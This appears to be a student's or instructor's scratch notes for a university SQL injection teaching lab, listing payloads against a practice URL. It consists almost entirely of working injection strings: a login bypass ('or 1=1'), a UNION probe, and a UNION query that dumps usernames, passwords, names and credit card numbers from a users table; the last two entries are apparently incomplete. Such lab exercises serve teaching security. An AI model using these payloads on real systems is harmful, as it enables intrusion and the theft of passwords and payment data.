http://snafu.staff.uod.otago.ac.nz:8080/injection/
// basic injection
' or 1=1;--
// can we exfil data?
' union select 'WOOHOO'; --
// get entire users table
' union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name; --
// change color
food
// change back button
food
Back